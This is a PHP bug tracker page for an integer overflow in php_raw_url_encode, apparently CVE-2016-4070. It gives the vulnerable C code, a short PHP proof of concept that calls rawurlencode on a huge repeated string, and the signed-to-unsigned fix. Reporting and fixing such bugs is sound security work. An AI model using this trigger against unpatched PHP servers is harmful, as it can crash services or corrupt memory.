|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-03-11 11:48 UTC] taoguangchen at icloud dot com
[2016-03-27 21:23 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-03-27 21:23 UTC] stas@php.net
[2016-03-27 21:25 UTC] stas@php.net
[2016-03-29 06:55 UTC] stas@php.net
[2016-03-29 06:55 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-03-29 09:30 UTC] ab@php.net
[2016-04-25 06:15 UTC] henri at nerv dot fi
[2016-04-25 07:00 UTC] stas@php.net
-CVE-ID:
+CVE-ID: 2016-4070
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 11:01:29 2024 UTC |
Description: ------------ ``` PHPAPI char *php_raw_url_encode(char const *s, int len, int *new_length) { register int x, y; unsigned char *str; str = (unsigned char *) safe_emalloc(3, len, 1); for (x = 0, y = 0; len--; x++, y++) { str[y] = (unsigned char) s[x]; ``` PoC: ``` <?php ini_set('memory_limit', -1); rawurlencode(str_repeat('&', 0xffffffff/3)); ?> ``` Fix: ``` - register int x, y; + register unsigned int x, y; ```